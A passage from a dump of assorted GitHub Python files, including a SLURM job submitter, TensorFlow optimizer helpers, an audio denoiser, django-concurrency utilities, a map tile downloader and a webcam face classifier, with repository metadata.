{len(pessoa)} Pessoas.')\r\n\r\nprint(f'O maior peso encontrado foi: {maior}Kg. Os pesos sao de :', end=' ')\r\nfor p in pessoa:\r\n if p[1] == maior:\r\n print(f'[{p[0]}]', end=' e ')\r\nprint(f'\\nO menor peso encontrado foi: {menor}Kg. Os pesos sao de :', end=' ')\r\nfor p in pessoa:\r\n if p[1] == menor:\r\n print(f'[{p[0]}]', end=' e ')\r\n ","repo_name":"HebertZanatelli/Python","sub_path":"CursoEmVideo/Exercicios/084.py","file_name":"084.py","file_ext":"py","file_size_in_byte":969,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"22367553134","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Sep 24 17:16:09 2021\n\n@author: joshuaumiamaka\n\"\"\"\n\ntry:\n from commands import getoutput\nexcept:\n from subprocess import getoutput\nimport glob\nimport random\nimport time\nfrom astropy.io import fits\nimport tqdm\n\n\ndef get_number_of_jobs():\n return len(getoutput(\"squeue | grep $USER\").split('\\n'))\n\nfiles_made = glob.glob(\"file-home*F115W*fits\")\n#files_made = [item.replace(\"F115W\", \"f115w\") for item in files_made]\n\nfor image in tqdm.tqdm(glob.glob('/home/tatumumi/supernova_lts/JWST_Vela/*/*/*/*/*f115w/*a0.[2-9]*_same_scale.fits')):\n output_image_name = \"file\" + image.replace(\"/\", \"-\").replace(\"f115w\", \"F115W\")\n run_this_image = False\n\n if files_made.count(output_image_name) == 0:\n run_this_image = True\n print(\"Couldn't find \", output_image_name, \"rerunning\")\n else:\n try:\n for filt in [\"F115W\", \"F150W\", \"F277W\", \"F444W\"]:\n f = fits.open(output_image_name.replace(\"F115W\", filt))\n f.close()\n print(\"opened \", output_image_name.replace(\"F115W\", filt), \"okay\")\n\n run_this_image = False # output_image_name exists, and it's a valid fits file\n except:\n print(\"Found \", output_image_name, \"but there was a problem opening it\")\n run_this_image = True\n\n\n \n if run_this_image:\n f = open(\"sub.sh\", 'w')\n f.write(\"#!/bin/bash\\n\")\n f.write(\"#SBATCH --job-name=example\\n\")\n f.write(\"#SBATCH --partition=shared\\n\")\n f.write(\"#SBATCH --time=0-00:05:00 ## time format is DD-HH:MM:SS\\n\")\n f.write(\"#SBATCH --nodes=1\\n\")\n f.write(\"#SBATCH --cpus-per-task=1\\n\")\n f.write(\"#SBATCH --mem=4G # Memory per node my job requires\\n\")\n f.write(\"#SBATCH --error=example-%A.err # %A - filled with jobid, where to write the stderr\\n\")\n f.write(\"#SBATCH --output=example-%A.out # %A - filled with jobid, wher to write the stdout\\n\")\n f.write(\"source ~/.bash_profile\\n\")\n f.write(\"cd /home/tatumumi/supernova_lts/JWST_Machine_Learning\\n\")\n f.write(\"python MachineLearningProjectFinal.py \" + image)\n f.close()\n\n while get_number_of_jobs() > 150:\n print(\"Too many jobs. Checking again soon.\")\n time.sleep(3.)\n\n print(getoutput(\"sbatch sub.sh\"))\n time.sleep(0.25)\n \n","repo_name":"tatumumi/JWST_Machine_Learning","sub_path":"runJob.py","file_name":"runJob.py","file_ext":"py","file_size_in_byte":2226,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"18565590524","text":"import os\nimport logging\nimport tensorflow as tf\nimport tensorflow.keras as keras\nfrom tensorflow.keras.callbacks import ModelCheckpoint\nfrom tensorflow.keras.callbacks import CSVLogger\nimport newton_cg as es\nfrom schedulers import ExponentialDecayCustom\n\n\nclass CustomSchedule(tf.keras.optimizers.schedules.LearningRateSchedule):\n def __init__(self, d_model, warmup_steps=4000):\n super(CustomSchedule, self).__init__()\n self.d_model = d_model\n self.d_model = tf.cast(self.d_model, tf.float32)\n self.warmup_steps = warmup_steps\n\n def __call__(self, step):\n arg1 = tf.math.rsqrt(step)\n arg2 = step * (self.warmup_steps ** -1.5)\n return tf.math.rsqrt(self.d_model) * tf.math.minimum(arg1, arg2)\n\n\ndef set_tf_loglevel(level):\n if level >= logging.FATAL:\n os.environ['TF_CPP_MIN_LOG_LEVEL'] = '3'\n if level >= logging.ERROR:\n os.environ['TF_CPP_MIN_LOG_LEVEL'] = '2'\n if level >= logging.WARNING:\n os.environ['TF_CPP_MIN_LOG_LEVEL'] = '1'\n else:\n os.environ['TF_CPP_MIN_LOG_LEVEL'] = '0'\n logging.getLogger('tensorflow').setLevel(level)\n\n\ndef set_optimizers(cfg_optimizers, d_model):\n optimizers = []\n if \"Adam\" in cfg_optimizers and cfg_optimizers[\"Adam\"]:\n for adam_kwargs in cfg_optimizers[\"Adam\"]:\n if adam_kwargs['learning_rate'] == 'CustomSchedule':\n adam_kwargs.pop(\"learning_rate\")\n opt = tf.keras.optimizers.Adam(learning_rate=CustomSchedule(d_model), **adam_kwargs)\n optimizers.append((opt, \"Adam\", 'CustomSchedule'))\n else:\n opt = tf.keras.optimizers.Adam(**adam_kwargs)\n optimizers.append((opt, \"Adam\", adam_kwargs['learning_rate']))\n\n if \"SGD\" in cfg_optimizers and cfg_optimizers[\"SGD\"]:\n for sgd_kwargs in cfg_optimizers[\"SGD\"]:\n opt = tf.keras.optimizers.SGD(**sgd_kwargs)\n optimizers.append((opt, \"SGD\", sgd_kwargs['learning_rate']))\n\n if \"Newton_CG\" in cfg_optimizers and cfg_optimizers[\"Newton_CG\"]:\n for cg_kwargs in cfg_optimizers[\"Newton_CG\"]:\n if cg_kwargs['learning_rate'] == 'ExponentialDecayCustom':\n cg_kwargs.pop('learning_rate')\n opt = es.EHNewtonOptimizer(learning_rate=ExponentialDecayCustom(0.001, 4000, 0.96), **cg_kwargs)\n optimizers.append((opt, \"Newton_CG\", 'ExponentialDecayCustom', cg_kwargs['tau']))\n else:\n opt = es.EHNewtonOptimizer(**cg_kwargs)\n optimizers.append((opt, \"Newton_CG\", cg_kwargs['learning_rate'], cg_kwargs['tau']))\n\n print(\"-\" * 30, \"Optimizers Information\", \"-\" * 30)\n for optimizer in optimizers:\n if optimizer[1] == \"Newton_CG\":\n _, name, lr, tau = optimizer\n print(f'opt= {name}, lr={lr}, tau={tau}')\n else:\n _, name, lr = optimizer\n print(f'opt= {name}, lr={lr}')\n return optimizers\n","repo_name":"severin617/nlp-newton-cg","sub_path":"utilities.py","file_name":"utilities.py","file_ext":"py","file_size_in_byte":2955,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"8827553744","text":"from api.applications.models import Application\nfrom api.funds.models import Fund\nfrom api.workflows.models import WorkFlow\n\n\nclass AllEligibilityDecisionTaken:\n def __init__(self, fund: Fund):\n self.fund = fund\n\n def process(self):\n applications = Application.objects.filter(fund=self.fund)\n for application in applications:\n if application.status not in [Application.Status.CREATED, Application.Status.SUBMITTED]:\n continue\n\n parent_workflow = application.workflow\n\n # If no parent workflow, this application has not been started,\n # so it can not be true that eligibility has been completed.\n if parent_workflow is None:\n return False\n\n if application.eligibility_response and application.eligibility_response.is_approved:\n continue\n\n eligibility_workflow = parent_workflow.child_workflows.filter(\n module=WorkFlow.WorkFlowModuleChoices.ELIGIBILITY.value\n ).last()\n is_eligibility_approved = eligibility_workflow and eligibility_workflow.is_completed\n if not is_eligibility_approved:\n return False\n\n return True\n","repo_name":"tayyabsaleem7756/jobtest","sub_path":"backend/retail_market/api/funds/services/all_eligibility_decision_taken.py","file_name":"all_eligibility_decision_taken.py","file_ext":"py","file_size_in_byte":1234,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"28352679396","text":"from gevent import monkey\nmonkey.patch_all(thread=False)\n\nimport argparse\nfrom flask import Flask\nfrom maat import MaatAgent, create_agent_api\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser(description=\"Maât-Agent\")\n parser.add_argument(\n \"--process_name\", default=\"rsession\", type=str,\n help=\"The name of the process to watch\"\n )\n parser.add_argument(\"-s\", \"--sleep_time\", default=5.0, type=float, help=\"Interval between each refresh of data\")\n parser.add_argument(\n \"--process_interval\", default=2.5, type=float,\n help=\"Time between refresh process\"\n )\n parser.add_argument(\"-o\", \"--host\", default=\"0.0.0.0\", type=str, help=\"Host to listen to\")\n parser.add_argument(\"-p\", \"--port\", default=5000, type=int, help=\"Port to listen to\")\n\n args = parser.parse_args()\n\n maat_agent = MaatAgent(\n args.process_name, sleep_time=args.sleep_time, process_interval=args.process_interval\n )\n\n app = Flask(\"Maat-Agent\")\n\n create_agent_api(args.host, args.port, maat_agent, app)","repo_name":"Valdimus/Maat","sub_path":"test_agent.py","file_name":"test_agent.py","file_ext":"py","file_size_in_byte":1055,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"27600899604","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n# @Author : mofei\n# @Time : 2020/3/11 19:25\n# @File : p03_parse_simple_xml_data.py\n# @Software: PyCharm\n\n\"\"\"解析简单的XML数据\"\"\"\n\nfrom urllib.request import urlopen\nfrom xml.etree.ElementTree import parse\n\n# 使用 xml.etree.ElementTree 模块从简单的XML文档中提取数据\nu = urlopen('http://planet.python.org/rss20.xml')\ndoc = parse(u)\n\nfor item in doc.iterfind('channel/item'):\n title = item.findtext('title')\n date = item.findtext('pubDate')\n link = item.findtext('link')\n\n print(title)\n print(date)\n print(link)\n print()\n","repo_name":"mofei952/cookbook","sub_path":"c06_data_encoding_and_process/p03_parse_simple_xml_data.py","file_name":"p03_parse_simple_xml_data.py","file_ext":"py","file_size_in_byte":615,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"21830623653","text":"from __future__ import division\nimport numpy as np\nfrom scipy.io.wavfile import read, write\nfrom .logmmse import logmmse as _logmmse\nfrom .utils import to_float, from_float\n\nnp.seterr('raise')\n\ndef mono_logmmse(m_input, fs, dtype, initial_noise=6, window_size=0, noise_threshold=0.15):\n num_frames = len(m_input)\n chunk_size = int(np.floor(60*fs))\n m_output = np.array([], dtype=dtype)\n saved_params = None\n frames_read = 0\n while frames_read < num_frames:\n frames = num_frames - frames_read if frames_read + chunk_size > num_frames else chunk_size\n signal = m_input[frames_read:frames_read + frames]\n frames_read = frames_read + frames\n _output, saved_params = _logmmse(signal, fs, initial_noise, window_size, noise_threshold, saved_params)\n m_output = np.concatenate((m_output, from_float(_output, dtype)))\n return m_output\n\ndef logmmse(data, sampling_rate, output_file=None, initial_noise=6,\n window_size=0, noise_threshold=0.15):\n data, dtype = to_float(data)\n data += np.finfo(np.float64).eps\n if data.ndim == 1:\n output = mono_logmmse(data, sampling_rate, dtype, initial_noise, window_size,\n noise_threshold)\n else:\n output = []\n for _, m_input in enumerate(data.T):\n output.append(mono_logmmse(m_input, sampling_rate, dtype, initial_noise,\n window_size, noise_threshold))\n output = np.array(output)\n if output_file is not None:\n write(output_file, sampling_rate, output.T)\n return output.T\n\ndef logmmse_from_file(input_file, output_file=None, initial_noise=6,\n window_size=0, noise_threshold=0.15):\n sampling_rate, data = read(input_file, 'r')\n return logmmse(data, sampling_rate, output_file, initial_noise,\n window_size, noise_threshold)\n","repo_name":"rajivpoddar/logmmse","sub_path":"logmmse/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":1886,"program_lang":"python","lang":"en","doc_type":"code","stars":83,"dataset":"github-code","pt":"53"} +{"seq_id":"25471100174","text":"from roco.library.driver import Driver\nfrom roco.derived.composables.target.arduino_target import Arduino\nfrom roco.derived.composables.electrical_composable import ElectricalComposable\nfrom roco.derived.ports.electrical_port import ElectricalPort\nfrom roco.derived.ports.analog_port import AnalogOutputPort, AnalogInputPort\nfrom roco.derived.ports.int_port import OutIntPort\n\nclass PotDriver(Driver):\n\n def __init__(self, yaml_file=None, **kwargs):\n Driver.__init__(self, yaml_file, **kwargs)\n\n def define(self, **kwargs):\n Driver.define(self, **kwargs)\n\n self.physical = {\n \"numPins\": 3,\n \"power\": {\n \"Vin\": [0],\n \"Ground\": [2]\n },\n \"aliases\": [\"first pin\", \"center pin\", \"last pin\"],\n }\n\n self.pmap = [None, \"pin\", None]\n\n self.add_parameter(\"pin\", \"\", is_symbol=False)\n\n self.meta = {\n Arduino: {\n \"code\": \"\",\n\n \"inputs\": {\n },\n\n \"outputs\": {\n \"analog@@name@@\": \"analogRead(<>)\"\n },\n\n \"declarations\": \"\",\n \"setup\": \"\",\n \"needs\": set()\n }\n }\n self.add_interface(\"vIn\", AnalogInputPort(self, [1], virtual=True))\n self.add_interface(\"aOut\", AnalogOutputPort(self, [1], virtual=True))\n self.add_interface(\"outInt\", OutIntPort(self, \"outInt\", \"analog@@name@@\"))\n\nif __name__ == '__main__':\n a = PotDriver(name=\"pot_driver1\")\n a.make_output()\n","repo_name":"uclalemur/roco","sub_path":"roco/library/pot_driver.py","file_name":"pot_driver.py","file_ext":"py","file_size_in_byte":1579,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"30555087201","text":"import inspect\nimport logging\nimport warnings\n\nfrom concurrency.exceptions import RecordModifiedError\n\nlogger = logging.getLogger(__name__)\n\n\ndef deprecated(replacement=None, version=None):\n \"\"\"A decorator which can be used to mark functions as deprecated.\n replacement is a callable that will be called with the same args\n as the decorated function.\n >>> import pytest\n >>> @deprecated()\n ... def foo1(x):\n ... return x\n ...\n >>> pytest.warns(DeprecationWarning, foo1, 1)\n 1\n >>> def newfun(x):\n ... return 0\n ...\n >>> @deprecated(newfun, '1.1')\n ... def foo2(x):\n ... return x\n ...\n >>> pytest.warns(DeprecationWarning, foo2, 1)\n 0\n >>>\n \"\"\"\n\n def outer(oldfun):\n def inner(*args, **kwargs):\n msg = \"%s is deprecated\" % oldfun.__name__\n if version is not None:\n msg += \"will be removed in version %s;\" % version\n if replacement is not None:\n msg += \"; use %s instead\" % (replacement)\n warnings.warn(msg, DeprecationWarning, stacklevel=2)\n if callable(replacement):\n return replacement(*args, **kwargs)\n else:\n return oldfun(*args, **kwargs)\n\n return inner\n\n return outer\n\n\nclass ConcurrencyTestMixin:\n \"\"\"\n Mixin class to test Models that use `VersionField`\n\n this class offer a simple test scenario. Its purpose is to discover\n some conflict in the `save()` inheritance::\n\n from concurrency.utils import ConcurrencyTestMixin\n from myproject.models import MyModel\n\n class MyModelTest(ConcurrencyTestMixin, TestCase):\n concurrency_model = TestModel0\n concurrency_kwargs = {'username': 'test'}\n\n \"\"\"\n\n concurrency_model = None\n concurrency_kwargs = {}\n\n def _get_concurrency_target(self, **kwargs):\n # WARNING this method must be idempotent. ie must returns\n # always a fresh copy of the record\n args = dict(self.concurrency_kwargs)\n args.update(kwargs)\n return self.concurrency_model.objects.get_or_create(**args)[0]\n\n def test_concurrency_conflict(self):\n import concurrency.api as api\n\n target = self._get_concurrency_target()\n target_copy = self._get_concurrency_target()\n v1 = api.get_revision_of_object(target)\n v2 = api.get_revision_of_object(target_copy)\n assert v1 == v2, \"got same row with different version (%s/%s)\" % (v1, v2)\n target.save()\n assert target.pk is not None # sanity check\n self.assertRaises(RecordModifiedError, target_copy.save)\n\n def test_concurrency_safety(self):\n import concurrency.api as api\n\n target = self.concurrency_model()\n version = api.get_revision_of_object(target)\n self.assertFalse(bool(version), \"version is not null %s\" % version)\n\n def test_concurrency_management(self):\n target = self.concurrency_model\n self.assertTrue(hasattr(target, '_concurrencymeta'),\n \"%s is not under concurrency management\" % self.concurrency_model)\n\n revision_field = target._concurrencymeta.field\n\n self.assertTrue(revision_field in target._meta.fields,\n \"%s: version field not in meta.fields\" % self.concurrency_model)\n\n\nclass ConcurrencyAdminTestMixin:\n pass\n\n\ndef refetch(model_instance):\n \"\"\"\n Reload model instance from the database\n # \"\"\"\n return model_instance.__class__.objects.get(pk=model_instance.pk)\n\n\ndef get_classname(o):\n \"\"\" Returns the classname of an object r a class\n\n :param o:\n :return:\n \"\"\"\n if inspect.isclass(o):\n target = o\n elif callable(o):\n target = o\n else:\n target = o.__class__\n try:\n return target.__qualname__\n except AttributeError: # pragma: no cover\n return target.__name__\n\n\ndef fqn(o):\n \"\"\"Returns the fully qualified class name of an object or a class\n\n :param o: object or class\n :return: class name\n\n >>> import concurrency.fields\n >>> fqn('str')\n Traceback (most recent call last):\n ...\n ValueError: Invalid argument `str`\n >>> class A:\n ... def method(self):\n ... pass\n >>> str(fqn(A))\n 'concurrency.utils.A'\n\n >>> str(fqn(A()))\n 'concurrency.utils.A'\n\n >>> str(fqn(concurrency.fields))\n 'concurrency.fields'\n\n >>> str(fqn(A.method))\n 'concurrency.utils.A.method'\n\n\n \"\"\"\n parts = []\n\n # if inspect.ismethod(o):\n # try:\n # cls = o.im_class\n # except AttributeError:\n # # Python 3 eliminates im_class, substitutes __module__ and\n # # __qualname__ to provide similar information.\n # parts = (o.__module__, o.__qualname__)\n # else:\n # parts = (fqn(cls), get_classname(o))\n if hasattr(o, '__module__'):\n parts.append(o.__module__)\n parts.append(get_classname(o))\n elif inspect.ismodule(o):\n return o.__name__\n if not parts:\n raise ValueError(\"Invalid argument `%s`\" % o)\n return \".\".join(parts)\n\n\ndef flatten(iterable):\n \"\"\"\n flatten(sequence) -> list\n\n Returns a single, flat list which contains all elements retrieved\n from the sequence and all recursively contained sub-sequences\n (iterables).\n\n :param sequence: any object that implements iterable protocol (see: :ref:`typeiter`)\n :return: list\n\n Examples:\n\n >>> from adminactions.utils import flatten\n >>> [1, 2, [3,4], (5,6)]\n [1, 2, [3, 4], (5, 6)]\n\n >>> flatten([[[1,2,3], (42,None)], [4,5], [6], 7, (8,9,10)])\n [1, 2, 3, 42, None, 4, 5, 6, 7, 8, 9, 10]\"\"\"\n\n result = list()\n for el in iterable:\n if hasattr(el, \"__iter__\") and not isinstance(el, str):\n result.extend(flatten(el))\n else:\n result.append(el)\n return list(result)\n","repo_name":"saxix/django-concurrency","sub_path":"src/concurrency/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":5901,"program_lang":"python","lang":"en","doc_type":"code","stars":416,"dataset":"github-code","pt":"53"} +{"seq_id":"72279982248","text":"inFile = open(\"input.txt\")\r\n\r\ncrc = 0\r\n\r\nfor l in inFile.readlines():\r\n inList = l.split('\\t')\r\n inList[-1] = inList[-1].rsplit('\\n')[0]\r\n inList = [ int(x) for x in inList]\r\n\r\n for i in range(0, len(inList)):\r\n for j in range(0,len(inList)):\r\n if j != i:\r\n if inList[j] % inList[i] == 0:\r\n crc += inList[j] / inList[i]\r\n\r\nprint(crc)","repo_name":"Flourish3/AdventOfCode","sub_path":"2017/AOC/day2/day2_2.py","file_name":"day2_2.py","file_ext":"py","file_size_in_byte":398,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"38547225145","text":"\"\"\"\nWe assume that every step preserves continuity,\nthat is all stepmatrices in a row has same height.\nand all stepmatrices in a column have the same width.\n\nWe assume that there are no cases when the same colors\nexpand to different matrices.\n\nThe color None expands to the smallest possible None matrix.\n\"\"\"\n\nfrom numpy import array, zeros\n\nclass StepMatrix:\n \"\"\"A fractal structure that knows its matrix at every step.\n \n The StepMatrix is constructed from a 2D integer numpy array,\n and uses the internal __color__ table at each step to\n construct the next one. Zero always expands to itself.\n \"\"\"\n \n colors = {}\n\n @classmethod\n def add_color(cls, stepmatrix):\n \"\"\"Adds a color to the expansion and return its index.\n \"\"\"\n if cls.colors:\n i = max(cls.colors.keys())\n else:\n i = 0\n cls.colors[i+1] = stepmatrix\n return i+1\n \n def __init__(self, matrix):\n self.depths = [ array(matrix, dtype=\"u1\") ] \n self.__array_interface__ = self.depths[0].__array_interface__\n self.clset = {cell for row in self.depths[0] for cell in row}\n\n def at_depth(self, n):\n \"\"\"Returns the matrix after `n` substitutions.\n \n The result is cached.\n \"\"\"\n if len(self.depths) <= n:\n self.depths.extend([None]*(n-len(self.depths)+1))\n if self.depths[n] is None:\n self.depths[n] = self.expand(n)\n return self.depths[n]\n \n def expand(self, n):\n \"\"\"Calculates the matrix after `n` substitutions.\n \"\"\"\n \n submatrices = {k:self.colors[k].at_depth(n-1) for k in self.clset if k!=0}\n \n basis = self.at_depth(0)\n \n H, W = basis.shape\n \n widths = [None]*W\n heights = [None]*H\n \n for x, row in enumerate(basis):\n for y, cell in enumerate(row):\n if cell == 0: # Zero is not expanded\n continue\n \n hh, ww = submatrices[cell].shape\n \n if widths[y] is None:\n widths[y] = ww\n elif widths[y] != ww:\n raise ValueError(\"Cell {}@({},{}) expands to W={},\"\n \" but a previous cell expanded to W={}\"\n .format(cell, x, y, ww, widths[y]))\n \n if heights[x] is None:\n heights[x] = hh\n elif heights[x] != hh:\n raise ValueError(\"Cell {}@({},{}) expands to H={}, \"\n \"but a previous cell expanded to H={}\"\n .format(cell, x, y, hh, heights[x]))\n \n if None in widths:\n raise ValueError(\"None encountered in column widths : {}\".format(widths))\n if None in heights:\n raise ValueError(\"None encountered in row heights : {}\".format(heights))\n \n # New empty matrix\n matrix = zeros((sum(heights), sum(widths)), dtype=\"u1\")\n \n i, j = 0, 0\n for x, row in enumerate(basis):\n hh = heights[x]\n for y, cell in enumerate(row):\n ww = widths[y]\n if cell == 0:\n i += ww\n continue\n matrix[j:j+hh, i:i+ww] = submatrices[cell]\n i += ww\n i = 0\n j += hh\n \n return matrix\n\nclass NoneMatrix(StepMatrix):\n def __init__(self, W, H):\n self.matrix = [[None]*W for i in range(H)]\n\nif __name__ == \"__main__\":\n\n from PIL import Image, ImagePalette\n import sys\n \n if len(sys.argv) < 2:\n print(\"Please supply a filename\")\n quit()\n\n if len(sys.argv) > 2:\n n = int(sys.argv[2])\n else:\n n = 3\n\n A, B, C = 1, 2, 3\n\n # A\n StepMatrix.add_color(StepMatrix([[A, A, A],\n [A, C, A],\n [A, A, A]]))\n \n # B\n StepMatrix.add_color(StepMatrix([[A, B, A],\n [B, C, B],\n [A, B, A]]))\n \n # C\n StepMatrix.add_color(StepMatrix([[C, C, C],\n [C, B, C],\n [C, C, C]]))\n\n fractal = Image.fromarray(StepMatrix.colors[A].at_depth(n), \"P\")\n palette = ImagePalette.ImagePalette()\n palette.getcolor((0, 0, 0))\n palette.getcolor((10, 10, 10))\n palette.getcolor((0, 128, 0))\n palette.getcolor((0, 0, 200))\n fractal.putpalette(palette)\n fractal.save(sys.argv[1])\n","repo_name":"typograph/pyfractal_2d","sub_path":"fractal.py","file_name":"fractal.py","file_ext":"py","file_size_in_byte":4653,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"4844688631","text":"import unittest\nfrom . import deploy\n\n\nclass TestBatch(unittest.TestCase):\n def test_divided(self):\n a = []\n for b in deploy.batch(range(4), 2):\n a.append(b)\n self.assertListEqual(a, [[0, 1], [2, 3]])\n\n def test_individed(self):\n a = []\n for b in deploy.batch(range(4), 3):\n a.append(b)\n self.assertListEqual(a, [[0, 1, 2], [3]])\n","repo_name":"michitaro/quickdb","sub_path":"quickdb/sspcatalog/deploy_test.py","file_name":"deploy_test.py","file_ext":"py","file_size_in_byte":400,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"32376219935","text":"\"\"\"\nThe dominator of array A is the value that occurs in more than half of the elements of A.\nWrite a function that, given an array A consisting of N integers, returns index of any element \nof array A in which the dominator of A occurs. The function should return -1 if array A does not\nhave a dominator.\n\nFor example, given array A=[3,4,3,2,3,-1,3,3] the function may return 0, 2, 4, 6 or 7.\n\"\"\"\n\nfrom collections import Counter\ndef solution(A):\n counter = Counter(A)\n for i, val in enumerate(A):\n if counter[val] > len(A)/2:\n return i\n return -1\n\nA=[3,4,3,2,3,-1,3,3]\nprint(solution(A))\n","repo_name":"ssuzana/codility-practice","sub_path":"08-leader/Dominator.py","file_name":"Dominator.py","file_ext":"py","file_size_in_byte":616,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"40720882377","text":"import urllib.request\nimport os\nimport mercator\nimport itertools\n\n\nclass Lonlatbox(object):\n def __init__(self, x0, y0, x1, y1):\n self.west = x0\n self.north = y0\n self.east = x1\n self.south = y1\n def __str__(self):\n return str(self.__dict__).replace(\"{\",\"\").replace(\"}\",\"\").replace(\"\\'\",\"\")\n\n\ndef lonrange(scale: int, bbox: Lonlatbox):\n return [x for x in range(0, 2 ** scale) if bbox.west < mercator.tile_lng(scale, x+1) and mercator.tile_lng(scale, x) < bbox.east]\n\n\ndef latrange(scale: int, bbox: Lonlatbox):\n return [x for x in range(0, 2 ** scale) if bbox.north > mercator.tile_lat(scale, x+1) and mercator.tile_lat(scale,x)> bbox.south]\n\n\ndef download_scale(scale: int, path: str, bbox: Lonlatbox, printf = print ):\n printf(\"downloading scale %s to %s\" % (scale, path))\n if not os.path.exists(path):\n os.makedirs(path)\n\n r = list(itertools.product(lonrange(scale, bbox), latrange(scale, bbox)))\n lr = len(r)\n printf(\"total tiles to download: %s\" % lr)\n\n for num ,(x, y) in enumerate(r):\n if not os.path.exists(os.path.join(path, \"%s_%s.png\" % (x, y))):\n response = urllib.request.urlopen('https://c.tile.opentopomap.org/%s/%s/%s.png' % (scale, x, y))\n png = response.read()\n open(os.path.join(path, \"%s_%s.png\" % (x, y)), 'wb').write(png)\n printf(\"\\r%s/%s\" % (num,lr), end=\"\")\n printf(\"\\ndownloaded\\n\")\n\n\ndef calculate_tile_count(scale: int, bbox: Lonlatbox, print_func = print):\n r = list(itertools.product(lonrange(scale, bbox), latrange(scale, bbox)))\n print_func(\"Zoom %s: Total tiles to download: %s\" % (scale ,len(r)))\n\n\n\ng_mapbox_token = \"pk.eyJ1IjoiYXNpODEiLCJhIjoiZDg1MjUxYTM2Y2RlNmU3ZGM4NjZhZmIxMTAxNDg0OWEifQ.CptV8UPpRwKkm1MM8-t4Lw\"\n\n\n# mapbox://styles/mapbox/streets-v9\n# mapbox://styles/mapbox/outdoors-v9\n# mapbox://styles/mapbox/light-v9\n# mapbox://styles/mapbox/dark-v9\n# mapbox://styles/mapbox/satellite-v9\n# mapbox://styles/mapbox/satellite-streets-v9\n\ndef get_mapbox_tile(zoom, x, y):\n mabbox_ref = 'http://a.tiles.mapbox.com/v4/mapbox.mapbox-streets-v7/%s/%s/%s.mvt?access_token=%s' % (\n zoom, x, y, g_mapbox_token)\n return mabbox_ref\n\n\n","repo_name":"Asi81/MapDownload","sub_path":"tileweb.py","file_name":"tileweb.py","file_ext":"py","file_size_in_byte":2206,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"53"} +{"seq_id":"70049178088","text":"import cv2\r\nimport mediapipe as mp\r\n\r\ncap = cv2.VideoCapture(0)\r\n\r\nmpFaceDetection = mp.solutions.face_detection\r\nmpDraw = mp.solutions.drawing_utils\r\nfaceDetection = mpFaceDetection.FaceDetection(0.5)\r\n\r\nwhile 1:\r\n success, img = cap.read()\r\n # in this it open the camera\r\n imgRGB = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)\r\n #change the color of the image it turns the image into blue,green and red to red green and blue\r\n results = faceDetection.process(imgRGB)\r\n\r\n if results.detections:\r\n for id, detection in enumerate(results.detections):\r\n #for loop that iterates over the list of results.detections\r\n bboxC = detection.location_data.relative_bounding_box\r\n #bboxC is a variable that is used to store the relative bounding box information for each detected face.\r\n mpDraw.draw_detection(img, detection)\r\n ih, iw, ic = img.shape\r\n bbox = int(bboxC.xmin * iw), int(bboxC.ymin * ih), \\\r\n int(bboxC.width * iw), int(bboxC.height * ih)\r\n #these are the length and width and height of the box and give the exact pixel values of the box\r\n cv2.rectangle(img, bbox, (255, 0, 255), 2)\r\n #In the above it will draw the box detected image and (255,0,255)\r\n\r\n cv2.imshow(\"Image\", img)\r\n # it is displaying the images on monitor or screen\r\n cv2.waitKey(1)\r\n #wait for a specified time\r\n\r\n\r\n\r\n\r\n","repo_name":"SACO14subrahmanyam/Face-detection-using-Mediapipe","sub_path":"face detection.py","file_name":"face detection.py","file_ext":"py","file_size_in_byte":1438,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"16737735422","text":"import cv2\nimport numpy as np\nfrom joblib import load\nimport face_recognition\n#import imutils\n\nHAAR_MODEL = './model-haar/haarcascade_frontalface_default.xml'\n\n# INPUT/OUTPUT PARAMETERS\nSVM_MODEL = './model/cs-faces-encoding.lib'\nFACE_SIZE = (256,256)\n\nfont = cv2.FONT_HERSHEY_SIMPLEX\ncolor_known = (0,255,0)\ncolor_unknown = (0,0,255)\nthreshold = 0.80\n\ndetector = cv2.CascadeClassifier(HAAR_MODEL)\nclassifier = load(SVM_MODEL)\n\ncapture = cv2.VideoCapture(0)\n#cv2.namedWindow(\"face classifier\", cv2.WND_PROP_FULLSCREEN)\n#cv2.setWindowProperty(\"face classifier\", cv2.WND_PROP_FULLSCREEN, cv2.WINDOW_FULLSCREEN)\nwhile True:\n ret, frame = capture.read()\n image = frame.copy()\n gray = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)\n rgb = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)\n faces = detector.detectMultiScale(gray, 1.3, 5)\n\n for (x, y, w, h) in faces:\n testset = []\n boxes = [(y, x + w, y + h, x)]\n encodings = face_recognition.face_encodings(rgb,boxes)\n if(len(encodings) > 0):\n testset.append(np.ravel(encodings[0]))\n pred = classifier.predict(testset)\n prob = classifier.predict_proba(testset)\n max_prob = max(prob[0])\n color = color_unknown\n if max_prob >= threshold:\n text = ''.join(pred[0] + ' (' + '{0:.2g}'.format(max_prob * 100) + '%)')\n color = color_known\n cv2.putText(image, text, (x,y-10), font, 0.6, color, thickness=2)\n else:\n color = 